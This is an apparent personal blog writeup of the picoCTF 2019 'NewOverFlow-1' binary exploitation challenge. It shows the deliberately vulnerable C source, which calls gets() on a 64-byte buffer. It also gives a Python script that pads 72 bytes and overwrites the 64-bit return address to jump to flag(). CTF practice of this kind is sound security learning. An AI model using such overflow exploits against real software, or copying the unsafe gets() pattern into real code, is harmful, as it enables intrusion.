Jason Turley's Website

picoCTF 2019 - NewOverFlow-1 writeup

Description

Let's try moving to 64-bit, but don't worry, we'll start easy. Overflow the buffer and change the return address to the flag function in this program.

Category: Binary Exploitation

Points: 200

Source Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFFSIZE 64
#define FLAGSIZE 64

void flag() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("'flag.txt' missing in the current directory!\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFFSIZE];
  gets(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
  vuln();
  return 0;
}

Explanation

This is similar to the OverFlow 1 challenge solved previously. We need to overwrite the saved return address so that it points to the flag function. The main difference is that this binary is 64-bit instead of 32-bit, so registers and stack slots (including the saved rbp and the return address) are 8 bytes wide instead of 4.

Plan

Exploit

My python code:

import struct
import sys

# 64-byte buffer followed by the 8-byte saved rbp, so 72 bytes of filler
# before the saved return address is reached
padding = b"A" * 72
# Address of flag(), packed as a little-endian 8-byte value
rip = struct.pack("<Q", 0x400767)

# Write raw bytes (not text) so the packed address is not mangled; the
# trailing newline terminates the gets() call
sys.stdout.buffer.write(padding + rip + b"\n")

The exploit successfully changes the return address to the start of the flag function. However, instead of printing the flag, I get the following message:

'flag.txt' missing in the current directory!

This is strange because flag.txt does exist in the directory. Idk if this is a problem with the challenge. If anyone has a fix please let me know!